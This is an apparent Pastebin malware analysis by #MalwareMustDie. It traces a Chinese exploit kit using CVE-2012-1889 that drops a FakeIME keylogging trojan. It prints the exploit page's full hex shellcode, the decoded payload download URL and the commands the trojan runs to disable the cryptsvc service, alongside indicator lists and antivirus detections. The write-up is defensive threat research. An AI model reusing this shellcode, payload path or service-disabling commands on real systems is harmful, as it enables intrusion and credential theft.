Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
- ================================
- CHINESE FAKE IME INFECTIONS
- STARTING FAKE NET SERVICE
- STARTING CRYPTER SERVICE
- INFO STEALER
- Found/analysis:
- #MalwareMustDie / @unixfreaxjp
- ================================
- -----------
- Infector IP:
- -----------
- IP: 222.73.57.117
- inetnum: 222.64.0.0 - 222.73.255.255
- netname: CHINANET-SH
- descr: CHINANET shanghai province network
- descr: China Telecom
- descr: No1,jin-rong Street
- descr: Beijing 100032
- country: CN
- -----------
- Info:
- -----------
- person: Wu Xiao Li
- address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
- country: CN
- phone: +86-21-63630562
- fax-no: +86-21-63630566
- e-mail: ip-admin@mail.online.sh.cn
- nic-hdl: XI5-AP
- mnt-by: MAINT-CHINANET-SH
- changed: ip-admin@mail.online.sh.cn 20010510
- source: APNIC
- -----------
- Infector urls:
- -----------
- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
- h00p://9f515lzff3.pppdiy.com/xy/xop.html
- h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
- h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
- h00p://9spxqc71fa.pppdiy.com/jy/xop.html
- h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
- h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
- h00p://s52csz5u47.pppdiy.com/wd/xop.html
- h00p://s5c2ouavle.pppdiy.com/ny/xop.html
- h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
- h00p://74jjdqugds.pppdiy.com/zt/xop.html
- h00p://75kay4lxj8.pppdiy.com/jy/xop.html
- h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
- h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
- h00p://rre11swub9.pppdiy.com/yh/xop.html
- h00p://436p1bwt5s.pppdiy.com/wd/xop.html
- h00p://4a41nvbsst.pppdiy.com/tl/xop.html
- h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
- h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
- h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
- h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
- h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
- h00p://4s2aqluitq.pppdiy.com/yl/xop.html
- h00p://52jbsoqe53.pppdiy.com/ah/xop.html
- h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
- h00p://rldq7secto.pppdiy.com/jy/xop.html
- h00p://roapzl6ao6.pppdiy.com/yl/xop.html
- h00p://rohws731yt.pppdiy.com/tl/xop.html
- h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
- h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
- h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
- h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
- h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
- h00p://2tvypppa1t.pppdiy.com/jx/xop.html
- h00p://2zaco8gjga.pppdiy.com/xy/xop.html
- h00p://31fclefhp5.pppdiy.com/jy/xop.html
- h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
- h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
- h00p://rceta3uznz.pppdiy.com/xy/xop.html
- h00p://11a1tgjoav.pppdiy.com/wd/xop.html
- h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
- h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
- h00p://r89i2jzv72.pppdiy.com/ah/xop.html
- h00p://r8cvnadv11.pppdiy.com/jx/xop.html
- h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
- h00p://r9mdp167ou.pppdiy.com/xy/xop.html
- h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
- h00p://q4u427a9d9.pppdiy.com/wl/xop.html
- h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
- h00p://qfckl9xclm.pppdiy.com/xy/xop.html
- h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
- h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
- h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
- h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
- h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
- h00p://pnj1c3glru.pppdiy.com/wd/xop.html
- h00p://pnrks68rrs.pppdiy.com/wd/xop.html
- h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
- h00p://pcsssued3v.pppdiy.com/tl/xop.html
- h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
- h00p://p444fcmod8.pppdiy.com/jy/xop.html
- h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
- h00p://z1v1awk14w.pppdiy.com/zx/xop.html
- h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
- h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
- h00p://x82ndlgusg.pppdiy.com/xy/xop.html
- h00p://xgbex2gqur.pppdiy.com/wd/xop.html
- h00p://xinfejn8sh.pppdiy.com/yh/xop.html
- h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
- h00p://yzua8al89b.pppdiy.com/wd/index.ht
- h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
- h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
- h00p://vlbujx6d19.pppdiy.com/xy/xop.html
- h00p://vouludav9m.pppdiy.com/wd/xop.html
- h00p://vqouin8qdg.pppdiy.com/wd/xop.html
- h00p://wjjxh168lj.pppdiy.com/wd/index.ht
- h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
- h00p://sw29diefib.pppdiy.com/wd/xop.html
- h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
- h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
- h00p://rlcensq6ds.pppdiy.com/wd/xop.html
- h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
- h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
- h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
- h00p://pjv68ibarl.pppdiy.com/ah/xop.html
- h00p://ow858ymp4d.pppdiy.com/xx/xop.html
- h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
- h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
- h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
- h00p://mj3aqytgna.pppdiy.com/wd/xop.html
- h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
- h00p://lsjq1ic827.pppdiy.com/zt/xop.html
- h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
- h00p://kltudl7ixd.pppdiy.com/wd/xop.html
- h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
- h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht
- h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
- h00p://joez462a36.pppdiy.com/xy/xop.html
- h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
- h00p://hrwvzspefk.pppdiy.com/my/xop.html
- h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
- h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
- h00p://gzfuswbru9.pppdiy.com/xy/xop.html
- h00p://gur1nihj4g.pppdiy.com/wd/xop.html
- h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
- h00p://fs12vmyw85.pppdiy.com/wd/xop.html
- h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
- h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
- h00p://dfmta9juu5.pppdiy.com/ah/xop.html
- h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
- h00p://85qcnilv1k.pppdiy.com/my/xop.html
- h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht
- h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
- h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
- h00p://zgxx2raoak.pppdiy.com/jx/xop.html
- h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
- h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
- h00p://uc18awkxod.pppdiy.com/my/xop.html
- h00p://v2229jswhx.pppdiy.com/wd/xop.html
- h00p://pxkxilbpos.pppdiy.com/wm/xop.html
- h00p://rakwmwhpve.pppdiy.com/xy/xop.html
- h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
- h00p://ny5iceirim.pppdiy.com/jx/xop.html
- h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
- h00p://agz5utxh9u.pppdiy.com/wd/index.ht
- h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
- h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
- h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
- h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
- h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
- h00p://odvn3j955e.pppdiy.com/zx/xop.html
- h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
- h00p://oixgmmsng1.pppdiy.com/xy/xop.html
- h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
- h00p://oaicu6zotz.pppdiy.com/zt/xop.html
- h00p://oannucq891.pppdiy.com/jx/xop.html
- h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
- h00p://nkkprh379v.pppdiy.com/wd/index.ht
- h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
- h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
- h00p://mzjqths79w.pppdiy.com/yl/xop.html
- h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
- h00p://n318aq72eb.pppdiy.com/jy/xop.html
- h00p://n3zxb481z3.pppdiy.com/yh/xop.html
- h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
- h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
- h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
- h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
- h00p://mu5dptjoda.pppdiy.com/xy/xop.html
- h00p://msogw56yis.pppdiy.com/xy/xop.html
- ======================
- ANALYSIS
- ======================
- --02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
- => `xop.html'
- Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
- Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 9,950 (9.7K) [text/html]
- 02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]
- -----------------------------
- [h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
- // ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Droped..
- <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
- <meta content="IE=7" h00p-equiv="X-UA-Compatible"/
- ------------shellcode executed------------------
- 58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 // CVE-2012-1889
- 0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd
- e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5
- b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e
- 8f bd bd d5 e8 ce d8 cf e9 36 fb b1 55 03 bc bd
- bd 36 55 d7 b8 e4 55 23 bf bd bd 5f 44 d5 d2 d3
- bd bd d5 c8 cf d1 d0 e9 42 ab 38 7d c8 ae d5 d2
- d3 bd bd d5 c8 cf d1 d0 e9 36 fb b1 55 33 bc bd
- bd 36 55 d7 bc e4 55 d3 bf bd bd 5f 44 d5 d1 8e
- 8f bd d5 ce d5 d8 d1 e9 36 fb b1 55 d2 bc bd bd
- 36 55 d7 bc e4 55 f2 bf bd bd 5f 44 3c 51 bd bc
- bd bd 36 61 3c 7e 3d bd bd bd d7 bd d7 a7 ee d7
- bd 42 eb e1 8e 7d fd 3d 81 be bd c8 44 7a b9 be
- e1 fa 93 d8 7a f9 be b9 c5 d8 bd bd 8e 74 ec ec
- ee ea ec 8e 7d 36 fb e5 55 9f bc bd bd 3e 45 bd
- 54 1e bd bd bd 2d d7 bd d7 bd d7 be d7 bd d7 bf
- d5 bd bd bd 7d ee 36 fb 99 55 bc bc bd bd 34 fb
- dd d7 bd ed 42 eb 95 34 fb d9 36 fb dd d7 bd d7
- bd d7 bd d7 b9 d7 bd ed 42 eb 91 d7 bd d7 bd d7
- bd d5 a2 bd b2 bd ed 42 eb 81 34 fb c5 36 f3 d9
- 3d c1 b5 42 09 c9 b1 3d c1 b5 42 bd c9 b8 3d c9
- b5 42 09 5f 56 34 3b 3d bd bd bd 7a fb cd bd bd
- bd bd 7a fb c9 bd bd bd bd d7 bd d7 bd d7 bd 36
- fb dd ed 42 eb 85 36 3b 3d bd bd bd d7 bd 30 f3
- c9 ec 42 cb cd ed 42 cb dd 42 eb 8d 42 cb dd 42
- eb 89 42 cb c5 42 eb fd 36 46 8e 7d 8e 66 3c 51
- bd bf bd bd 36 71 3e 45 e9 c0 b5 34 a1 bc 3e 7d
- b9 56 4e 36 71 36 64 3e 7e ad 8e 7d ed ec ee ed
- ed ed ed ed ed ea ed ed 42 eb b5 36 c3 e9 55 ad
- bc bd bd 55 d8 bd bd bd d5 de cb ca bd d5 ce d5
- d9 d2 e9 36 fb b1 55 99 bd bd bd 34 fb 81 d9 1c
- b9 bd bd bd 30 1d dd 42 42 42 d7 d8 42 cb 81 36
- fb ad 55 b5 bd bd bd 8e 66 ee ee ee ee 42 6d 3d
- 85 55 3d 85 54 c8 ac 3c c5 b8 2d 2d 2d 2d c9 b5
- 36 42 e8 36 51 30 fd b8 42 5d 55 1b bd bd bd 7e
- 55 1d bd bd bd 05 ac bc b9 3d 7f b1 bd 55 2e bd
- bd bd 3c 51 bd bc bd bd 36 41 3e 7a b9 7a ba 8f
- c9 2c b1 7a fa b9 de 34 6c f2 7a fa b5 1d d8 2a
- 76 7a fa b1 ec fd 07 c2 7a fa ad 83 a0 0b 84 7a
- fa a9 05 d4 69 a6 7a fa a5 03 c2 db 1d 7a fa a1
- 41 14 8a 10 7a fa 9d 25 b7 ad 45 d9 1c 8d bd bd
- bd 36 fd b1 36 cd a1 10 36 d5 b5 36 4a d7 b9 e4
- 55 e9 bd bd bd 2d 5f 45 d5 8e 8f bd bd d5 e8 ce
- d8 cf e9 36 bb 55 e8 42 42 42 36 55 d7 b8 e4 55
- 88 bd bd bd 5f 44 8e 42 ea 42 eb b9 56 bf e5 7e
- 55 44 42 42 42 e6 7b ba 05 34 e2 bc db 7a fa b8
- 42 5d 7e ee 36 61 ee d7 fd d5 bd ad bd bd ea 36
- fb 9d 55 a5 42 42 42 e5 7e ec eb 36 c8 81 36 c9
- 93 c5 be 48 eb 36 cb 9d be 48 8e 74 f4 fc 10 be
- 78 8e 66 b2 03 ad 87 6b c9 b5 7c 76 ba be 67 fd
- 56 4c 86 a2 c8 5a e3 36 e3 99 be 60 db 36 b1 f6
- 36 e3 a1 be 60 36 b9 36 be 78 16 e3 e4 7e 55 60
- 41 42 42 0f 4f 5f 49 84 5f c0 3e 67 f5 c6 80 8f
- c9 2c b1 38 62 12 06 de 34 6c f2 ec fd 07 c2 1d
- d8 2a 76 a3 19 d9 52 2e 8f 59 29 33 ae b7 11 7f
- a4 f6 bc 79 30 a2 c9 ea db b0 42 fe 03 11 66 c0
- 4d 18 27 ef 43 1a 67 83 a0 0b 84 05 d4 69 a6 03
- c2 db 1d 41 14 8a 10 25 b7 ad 45 3d 6b 12 27 46
- ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
- 93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
- c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
- bd bd bd bd bd bd ea ea
- ↑XOR and found h00p://222.73.57.117/exe/jx.exe // path found;
- -------------------------------
- --03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
- => `jx.exe'
- Connecting to 222.73.57.117:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 48,128 (47K) [application/octet-stream]
- ------------------------------------
- Sections:
- UPX0 0x1000 0x7000 0 <<<<<<< PACKED!!
- UPX1 0x8000 0xc000 46592 <<<<<<< PACKED!!
- UPX2 0x14000 0x1000 512 <<<<<<< PACKED!!
- //unpacking.....
- UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
- File size Ratio Format Name
- ------------------ ------ ----------- -----------
- 58880 <- 48128 81.74% win32/pe sample
- Unpacked 1 file.
- -------bin analysis------
- Fail CRC: Claimed: 0 Actual: 60344
- Fail Compile Time: 2033-11-12 07:06:07
- Compiler: Microsoft Visual C++ v6.0
- //strange,,,,
- 0x40402c CreateToolhelp32Snapshot
- 0x404054 Process32First
- 0x404080 Process32Next
- // Renaming itself....
- call sub_40161C
- call sub_401693
- mov ebx, offset aJx3client_exe ; "JX3Client.exe"
- --------------traces---------
- // Malware OP traces...
- 000000002FE6 0000004047E6 0 MoveFileA
- 000000003032 000000404832 0 WriteFile
- 00000000303E 00000040483E 0 CreateFileA
- 00000000304C 00000040484C 0 WinExec
- 000000003074 000000404874 0 CopyFileA
- // keystroke controlling...
- 0000000030C0 0000004048C0 0 GetKeyboardLayoutList
- 0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
- 0000000030F2 0000004048F2 0 ActivateKeyboardLayout
- 00000000310C 00000040490C 0 GetKeyboardLayout
- 000000003120 000000404920 0 LoadKeyboardLayoutA
- 000000003136 000000404936 0 UnloadKeyboardLayout
- // IME Traces...
- IMM32.dll.ImmGetDescriptionA Hint[0]
- IMM32.dll.ImmInstallIMEA Hint[0]
- IMM32.dll.ImmIsIME Hint[0]
- // temp OPS data
- 00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
- 000000003820 000000405220 0 %c:\RECYCLER\%d.tmp
- // Crypter service..
- 00000000E05C 00000040FA5C 0 sc delete cryptsvc
- 00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
- 00000000E094 00000040FA94 0 net stop cryptsvc
- //registry added traces
- 00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
- 00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
- 00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
- 00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
- 00000000E134 00000040FB34 0 %sdllcache\%s
- 00000000E144 00000040FB44 0 %syu%s //
- //Drops
- C:\WINDOWS\system32\chinasougou.ime
- C:\WINDOWS\system32\yumidimap.dll
- C:\WINDOWS\system32\net1.exe
- //Malwareservice...
- Filename: net1.exe
- MD5: 3f14c041342e3fba343f2a1d11e74bba
- SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
- File Size: 124928 Bytes
- Command Line: net1 stop cryptsvc
- //Crypter Service:
- Filename: sc.exe
- MD5: a48b1c06219a01a60cd8d4d45440bde9
- SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
- File Size: 31232 Bytes
- Command Line: sc config cryptsvc start= disabled
- ------------------------------------------------------
- VIRUS TOTAL CHECKS
- -----------------------------------------------------
- First Check in VT: (PACKED/ORIGINAL)
- https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
- McAfee : Artemis!BBFC347F66C1
- K7AntiVirus : Riskware
- TheHacker : Posible_Worm32
- F-Prot : W32/Heuristic-114!Eldorado
- ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
- TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
- Kaspersky : HEUR:Trojan.Win32.Generic
- F-Secure : Dropped:Trojan.PWS.FakeIME.B
- VIPRE : Trojan.Win32.Generic!BT
- AntiVir : TR/ATRAPS.Gen
- TrendMicro : TROJ_GEN.RCBCEHF
- McAfee-GW-Edition : Artemis!BBFC347F66C1
- Jiangmin : Trojan/Generic.algbo
- Microsoft : PWS:Win32/Lolyda.BF
- Commtouch : W32/Heuristic-114!Eldorado
- AhnLab-V3 : Trojan/Win32.Xema
- VBA32 : TrojanPSW.QQTen.ng
- PCTools : Trojan.Gen
- Ikarus : Trojan-PWS.Win32.Lolyda
- Fortinet : W32/Onlinegames.QBF!tr
- AVG : unknown virus Win32/DH{HhM6SEVn}
- Panda : Suspicious file
- ---------------------------------------------------------------------
- First Check in VT: (UNPACKED)
- https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/
- F-Secure : Dropped:Trojan.PWS.FakeIME.B
- DrWeb : BackDoor.PcClient.5930
- GData : Dropped:Trojan.PWS.FakeIME.B
- Symantec : Suspicious.Cloud.5
- Norman : W32/OnLineGames.NVOE
- ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
- eScan : Dropped:Trojan.PWS.FakeIME.B
- Fortinet : W32/Onlinegames.QBF!tr
- Emsisoft : Trojan-PWS.Win32.Lolyda!IK
- VBA32 : TrojanPSW.QQTen.ng
- Kaspersky : HEUR:Trojan.Win32.Generic
- Jiangmin : Trojan/Generic.algbo
- Rising : Trojan.Win32.Fednu.uhc
- Ikarus : Trojan-PWS.Win32.Lolyda
- AntiVir : TR/Crypt.ZPACK.Gen
- AVG : unknown virus Win32/DH{HhM6SEVn}
- Panda : Suspicious file
- ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
- Comodo : TrojWare.Win32.Poison.QBF
- INFECTOR: XOP.HTML
- https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/
- eScan : Exploit.CVE-2012-1889.Gen
- nProtect : Exploit.CVE-2012-1889.Gen
- CAT-QuickHeal : Exploit.CVE.2012.1889
- McAfee : Exploit-CVE2012-1889
- K7AntiVirus : Exploit
- F-Prot : JS/CVE-1889
- Norman : ShellCode.AA
- TotalDefense : JS/Tnega.VKD
- Avast : JS:CVE-2012-1889 [Expl]
- eSafe : JS.ShellCode.Aurora
- ClamAV : Exploit.CVE_2012_1889-6
- Kaspersky : HEUR:Exploit.Script.Generic
- BitDefender : Exploit.CVE-2012-1889.Gen
- Sophos : Mal/JSShell-B
- Comodo : TestSignature.JS.Agent.SH
- F-Secure : Exploit:JS/CVE-2012-1889.A
- DrWeb : Exploit.CVE2012-1889
- VIPRE : Exploit.HTML.CVE-2012-1889 (v)
- AntiVir : Exp/JS.Shellcode.H
- McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
- Emsisoft : Trojan.Script!IK
- ESET-NOD32 : JS/Exploit.Shellcode.A.gen
- Microsoft : Exploit:JS/ShellCode.AT
- GData : Exploit.CVE-2012-1889.Gen
- Commtouch : JS/CVE-1889
- AhnLab-V3 : JS/Agent
- Ikarus : Trojan.Script
- AVG : Exploit
- ====================================
- MALWARE MUST DIE!!!
- #MalwareMustDie
- Sept 29 2012 / @unixfreaxjp
- ===================================
Add Comment
Please, Sign In to add comment